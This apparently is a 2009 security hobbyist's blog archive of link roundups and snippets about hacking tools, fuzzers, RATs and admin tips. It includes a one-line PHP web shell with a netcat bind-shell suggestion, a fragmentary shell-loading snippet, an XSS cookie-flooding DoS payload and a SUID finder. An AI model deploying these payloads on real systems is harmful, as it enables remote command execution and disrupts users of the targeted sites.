Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:

Technorati Tags: ,,,

“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages: (Yes you have seen this one before, but in reference to their RAT)


Un.Aware eZine (

Uninformed eZine ( )

Phrack eZine ( )

Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( )

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from:

Copy and Paste the code below into a text file and name it AUForceUpdate.cmd

@echo off
Echo This batch file will Force the Update Detection from the AU client: 
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists) 
Echo 3. Deletes the DetectionStartTime registry key (if it exists) 
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv) 
Echo 6. Force the detection 
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.

tail -f, I must leave you for another

Stolen from:

tail -f

This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

Lenny Zeltser's Reverse Egineering Cheat Sheet:

And the Unix Toolbox. DO NOT underestimate the power of this booklet:

Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never, nor are signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find:

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc

Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

Danzer - ActiveX Fuzzer

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:

Friday, May 15, 2009

PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

       $shell = ""; //use something less obvious like readme.txt
       $code = file_get_contents($shell);
       fwrite($fp, $code);

Shell Code Development

Place has some pretty sick shellcode:

Huge List of Online Crackers

Don't know if all of these are online still or not:

md5: - Does Norwegian words too (for those who can’t read russian: put your md5 in the second box)…roducts_ id=7




User Profile Deletion Utility

Index of PHP Shells


Thursday, May 14, 2009

Finding SUID/SGID root programs


EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;

Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click without touching the site yourself.. ;-)

Also, my other favorite is:

Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

An awesome repository of interesting do-dads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

Thanks @marcusjcarey

Sunday, May 10, 2009

XSS based Client-side DoS

Makes the client's cookie for the site per subdomain 200kb.

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:


Another really fun RAT to play with:


RAT, and some interesting history dumping ;-)